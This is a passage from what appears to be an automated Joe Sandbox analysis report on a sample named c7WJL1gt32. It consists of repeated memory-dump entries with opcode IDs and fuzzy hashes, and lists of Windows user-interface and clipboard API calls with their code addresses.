                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c35762c7f159137755643edc542659900244529e511fd430732d2da08a7757a0
                                                                                                          • Instruction ID: 036a03c1d62e4ffed9efa88afe95320b83b569a3cdbe7f965b2b54453dd7be54
                                                                                                          • Opcode Fuzzy Hash: c35762c7f159137755643edc542659900244529e511fd430732d2da08a7757a0
                                                                                                          • Instruction Fuzzy Hash: 8EC19074E00218CFDB58DFA9C994B9DBBB2AF89300F5090A9D409AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ad31a8d4878fd5f83df16958dfaf83de364c64108b865cbe67b34c8faec71ec3
                                                                                                          • Instruction ID: 33f42ac042ad05896fbee00c9eb597a42494d55300cbaa59e90618018515e80f
                                                                                                          • Opcode Fuzzy Hash: ad31a8d4878fd5f83df16958dfaf83de364c64108b865cbe67b34c8faec71ec3
                                                                                                          • Instruction Fuzzy Hash: 21C1A174E00218CFDB54DFA9C994B9DBBB2BF89300F5080A9D509AB355DB359E86CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c5bdbac5546028335367e8ca2ed299ed7dd71c51d8af0994d2ff9159bc473b43
                                                                                                          • Instruction ID: c7f8c30bd9465f9d8c717c783d007b749d244fa635a6b057ad8d175efc3cd381
                                                                                                          • Opcode Fuzzy Hash: c5bdbac5546028335367e8ca2ed299ed7dd71c51d8af0994d2ff9159bc473b43
                                                                                                          • Instruction Fuzzy Hash: 3BC19074E00218CFDB58DFA9C994B9DBBB2BF89300F5080A9D509AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 09006d714f3f1678d30e64166cc75db9eebfe5c3e0b797cd7c998692309de399
                                                                                                          • Instruction ID: abd5be0c235385ff971e6e991bab0d76817b9cdfec7742f6eb1773411f4d4489
                                                                                                          • Opcode Fuzzy Hash: 09006d714f3f1678d30e64166cc75db9eebfe5c3e0b797cd7c998692309de399
                                                                                                          • Instruction Fuzzy Hash: F3C1A074E00218CFDB54DFA9C994B9DBBB2BF89300F6080A9D409AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7177fb0897f3aa9c3d5074084f230b672cd1d9ac06f77c32bb9969b4304581ae
                                                                                                          • Instruction ID: 807f4e936462bfeaacd05ffa8280e5503c6755394addb3e1bd79a4b2f1f34c3a
                                                                                                          • Opcode Fuzzy Hash: 7177fb0897f3aa9c3d5074084f230b672cd1d9ac06f77c32bb9969b4304581ae
                                                                                                          • Instruction Fuzzy Hash: AFC1A074E00218CFDB14DFA9C994B9DBBB2AF89300F1080A9D408BB355DB359E85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c8045d17cfab504151b2fba96cec6812e01879c596ea1ce209b145105b71b516
                                                                                                          • Instruction ID: a35943adf813e1c628d42f8d8021346e14220f73b833bfda359321020b4089c5
                                                                                                          • Opcode Fuzzy Hash: c8045d17cfab504151b2fba96cec6812e01879c596ea1ce209b145105b71b516
                                                                                                          • Instruction Fuzzy Hash: D4C19F74E01218CFDB14DFA9C994B9DBBB2BF89300F6080A9D509AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 13d5dc7e85808d4d4f7b6a5b50b2eb9ef21115dcbd7b335f5b6df8074882ca58
                                                                                                          • Instruction ID: 1da4ddfbfdf2b05c3411fe9c7a3635f404c09625ef396a63650455b98cfffd2c
                                                                                                          • Opcode Fuzzy Hash: 13d5dc7e85808d4d4f7b6a5b50b2eb9ef21115dcbd7b335f5b6df8074882ca58
                                                                                                          • Instruction Fuzzy Hash: E6C19F74E00218CFDB54DFA9C994B9DBBB2AF89300F6080A9D409BB365DB359E85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3a57a567667f85c4707c0b7ce5baa28a55552bd2d804874745c9c4f48ede62d
                                                                                                          • Instruction ID: 7d7a06435d818bc0fa18d16fec314812578a0de20d3e0417eb24fccd6701cb8c
                                                                                                          • Opcode Fuzzy Hash: e3a57a567667f85c4707c0b7ce5baa28a55552bd2d804874745c9c4f48ede62d
                                                                                                          • Instruction Fuzzy Hash: A5C1A074E00218CFDB14DFA9C994B9DBBB2AF89300F1081A9D409AB365EB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4ad350c40b989b4ea29ee071d3095fdd6c447c0454383e0f354c283b792a6274
                                                                                                          • Instruction ID: e2c52d27caeed1ce431de69ca0eb8b0d34bcad72850c1230f56b3219b7cb6033
                                                                                                          • Opcode Fuzzy Hash: 4ad350c40b989b4ea29ee071d3095fdd6c447c0454383e0f354c283b792a6274
                                                                                                          • Instruction Fuzzy Hash: 6FC19F74E00218CFDB14DFA9C994B9DBBB2BF89304F6080A9D409AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75f3194aa4dfc87573fe5bfd692101d9780f765b48a28074e823a1235af2b2bc
                                                                                                          • Instruction ID: 76c2a6bbc3feef63180f91033016c7709e071a1dcd8df1a39b5f8d409ab7e7ae
                                                                                                          • Opcode Fuzzy Hash: 75f3194aa4dfc87573fe5bfd692101d9780f765b48a28074e823a1235af2b2bc
                                                                                                          • Instruction Fuzzy Hash: 64C19074E00218CFDB14DFA9C994B9DBBB2BF89300F5081A9D509AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b255fbb04a2aee1c20b098eb7198cf78fafea5317250721d52c6e641c894d58c
                                                                                                          • Instruction ID: b24c0ef7ceda0147fd487481a59d110028a7f76424083c91778924010ab61015
                                                                                                          • Opcode Fuzzy Hash: b255fbb04a2aee1c20b098eb7198cf78fafea5317250721d52c6e641c894d58c
                                                                                                          • Instruction Fuzzy Hash: ACC19074E00218CFDB14DFA9C994B9DBBB2BF89300F6090A9D509AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b85b8890bde0479e85d9c35ac279f8abb2e82e3d49f862e0858f12daea792acb
                                                                                                          • Instruction ID: ae51de7fcb44c965d8e63f3dac9a7456ee490bc4412d62e66c4bb196a4e73e0d
                                                                                                          • Opcode Fuzzy Hash: b85b8890bde0479e85d9c35ac279f8abb2e82e3d49f862e0858f12daea792acb
                                                                                                          • Instruction Fuzzy Hash: 2AC1A074E00218CFDB14DFA9C994B9DBBB2AF89300F6081A9D909AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0db9b2e186053fa41a155fd307557c443c80517bb0770f1cf1df512476161e22
                                                                                                          • Instruction ID: b802153fad0a77d226298b8c8ebb85605ce8b343f28489865de27294475a7a1c
                                                                                                          • Opcode Fuzzy Hash: 0db9b2e186053fa41a155fd307557c443c80517bb0770f1cf1df512476161e22
                                                                                                          • Instruction Fuzzy Hash: 6DC19074E00218CFEB54DFA9C994B9DBBB2BF89300F5080A9D509AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5e28a1d1ec869cdd650485768414e6cf436fb43b2bc5ae16e5f23f9d8b8476e
                                                                                                          • Instruction ID: ab452afda23a50cbab29422a8059baa6a985cdf2e7da7bf2b79abb0e8cedb8a5
                                                                                                          • Opcode Fuzzy Hash: b5e28a1d1ec869cdd650485768414e6cf436fb43b2bc5ae16e5f23f9d8b8476e
                                                                                                          • Instruction Fuzzy Hash: 2EC19074E00218CFDB14DFA9C994B9DBBB2AF89300F5080A9D809AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cca8d7ef6c74b468f2c4f0975ace314133c52b780ece69cc85c61936d31d0e03
                                                                                                          • Instruction ID: ba8b15e539747c945434827cca09a288fa6044f6d60984370bb33f0199228997
                                                                                                          • Opcode Fuzzy Hash: cca8d7ef6c74b468f2c4f0975ace314133c52b780ece69cc85c61936d31d0e03
                                                                                                          • Instruction Fuzzy Hash: 38C19074E00218CFEB14DFA9C994B9DBBB2AF89300F6081A9D509BB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 351076f1a69b2fd8ebd051dedaf11f5f8231789e98794d72488feb04ce778dcf
                                                                                                          • Instruction ID: a1e36bfbcde4975401e3c72c7ca413bb0af58fa60ccaf9795239507c514c2ce0
                                                                                                          • Opcode Fuzzy Hash: 351076f1a69b2fd8ebd051dedaf11f5f8231789e98794d72488feb04ce778dcf
                                                                                                          • Instruction Fuzzy Hash: 4BC1A174E00218CFDB54DFA9C994B9DBBB2AF89300F5080A9D409BB365DB359E86CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c0a8710f85b10e66c13958a9c5ca31f60194ff44ec352c4b05e1a01244c0d938
                                                                                                          • Instruction ID: a80a84c6db01720f6ae78080f38598e572ff461d93d604b27b8ba21b8c6aa7bd
                                                                                                          • Opcode Fuzzy Hash: c0a8710f85b10e66c13958a9c5ca31f60194ff44ec352c4b05e1a01244c0d938
                                                                                                          • Instruction Fuzzy Hash: 2FC19074E00218CFDB54DFA9C994B9DBBB2BF89300F6080A9D509AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 347f65bd1858f93e9ff7113c898a3e58304bb14bf58a2873a826edd01740fbf4
                                                                                                          • Instruction ID: 34ccf65944318cbb6059f52eac8255ab19506010870fc2b85fd56efa10032c24
                                                                                                          • Opcode Fuzzy Hash: 347f65bd1858f93e9ff7113c898a3e58304bb14bf58a2873a826edd01740fbf4
                                                                                                          • Instruction Fuzzy Hash: 99C19F74E01218CFDB14DFA9C994B9DBBB2AF89300F6080A9D409BB365DB359E85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b027e64c5231b3fddd0935a334f376a8096f994571423d4950cc7f90a5235a2
                                                                                                          • Instruction ID: 1b8588b3c8b7d66f9abfec3c3531c4106e6891159e30c85041f5e20d3b47411e
                                                                                                          • Opcode Fuzzy Hash: 8b027e64c5231b3fddd0935a334f376a8096f994571423d4950cc7f90a5235a2
                                                                                                          • Instruction Fuzzy Hash: 9CC1A174E00218CFDB54DFA9C994B9DBBB2AF89300F5081A9D409AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1201104f4fabad4d3d97588c0f4b40112e56c2558e68d79e6510ee6e0590bfd5
                                                                                                          • Instruction ID: 37cb85635f3d21fd060e873f80def751b3893d833faab35d0ce7bee4d70b5bb0
                                                                                                          • Opcode Fuzzy Hash: 1201104f4fabad4d3d97588c0f4b40112e56c2558e68d79e6510ee6e0590bfd5
                                                                                                          • Instruction Fuzzy Hash: 8CC19074E00218CFDB54DFA9C994B9DBBB2BF89300F6080A9D409AB365DB359E85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fe169ba029e28fca085e74596ddf97a31a533db77ff6c3962381117f4544ab52
                                                                                                          • Instruction ID: 9a3bcab2eb267f00e774f35e9b21881c652940051bbcc09bec06372cde8c5685
                                                                                                          • Opcode Fuzzy Hash: fe169ba029e28fca085e74596ddf97a31a533db77ff6c3962381117f4544ab52
                                                                                                          • Instruction Fuzzy Hash: 31C1A074E00218CFDB54DFA9C994B9DBBB2BF89300F5090A9D408AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2980323979.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_38310000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfa22b48a43ddcbc9a01e57ce30870233ba8fea4dd88d38e39cffcf9d181e8f3
                                                                                                          • Instruction ID: 9fcbe8e1ff3ad31e039df981fe1a2e7fa8d975b13775deda06257e776dbb68d9
                                                                                                          • Opcode Fuzzy Hash: cfa22b48a43ddcbc9a01e57ce30870233ba8fea4dd88d38e39cffcf9d181e8f3
                                                                                                          • Instruction Fuzzy Hash: B9C1A074E01218CFDB14DFA9C994B9DBBB2BF89300F5081A9D409AB365EB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7bde8837a38192f01941f57631dea15530aaeb3f133f6f9b33db4d41f15b50ea
                                                                                                          • Instruction ID: c326717b7e5bad791114462b9b571f7ed057bfab64bd665653d840f6c50a3f7d
                                                                                                          • Opcode Fuzzy Hash: 7bde8837a38192f01941f57631dea15530aaeb3f133f6f9b33db4d41f15b50ea
                                                                                                          • Instruction Fuzzy Hash: 3EC19174E00218CFEB14DFA9C994B9DBBB2AF49304F6080A9D509BB355DB359E86CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d2736a2396d9d740ec105f9ac8cd959083eb79a10410cd8b8c887621c54619d1
                                                                                                          • Instruction ID: 7ac19cc2a70f7cbba6f944975e469c4ca3ba38e7b69211c1dc2efb31841b8316
                                                                                                          • Opcode Fuzzy Hash: d2736a2396d9d740ec105f9ac8cd959083eb79a10410cd8b8c887621c54619d1
                                                                                                          • Instruction Fuzzy Hash: 94C1A274E00218CFDB14DFA9C994BADBBB2AF89304F1081A9D509AB355DB359E86CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fb463a4b904d54be080964c50bbefbc0486cd79552303fabe441c793f4ebbcda
                                                                                                          • Instruction ID: 9b0f7bdf0c56fd5c075463e488bf74ae388145226e3e8d4782738b1803d3b9d8
                                                                                                          • Opcode Fuzzy Hash: fb463a4b904d54be080964c50bbefbc0486cd79552303fabe441c793f4ebbcda
                                                                                                          • Instruction Fuzzy Hash: 25C19174E00218CFEB14DFA9C994B9DBBB2BF89304F2080A9D509AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2979934383.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_37b60000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 25777bea3d09dc483dad059ba9d88efc53d0b057839fee23e058775ffbd42ff5
                                                                                                          • Instruction ID: 20e23bfe379c82456b88943eda90f265530ffe1fea7f85769118610acb5a01cf
                                                                                                          • Opcode Fuzzy Hash: 25777bea3d09dc483dad059ba9d88efc53d0b057839fee23e058775ffbd42ff5
                                                                                                          • Instruction Fuzzy Hash: 09C1A074E00218CFEB14DFA9C994B9DBBB2BF89304F6080A9D509AB355DB359E85CF50
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                          • ShowWindow.USER32(?,?), ref: 004056DC
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                            • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                          • ShowWindow.USER32(?,?), ref: 0040578D
                                                                                                          • ShowWindow.USER32(?), ref: 004057D7
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                          • CloseClipboard.USER32 ref: 00405912
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2950297414.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.2950279090.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950342850.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950359482.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: (7B${
                                                                                                          • API String ID: 590372296-525222780
                                                                                                          • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                          • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                          • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                          Strings
                                                                                                          Memory Dump Source
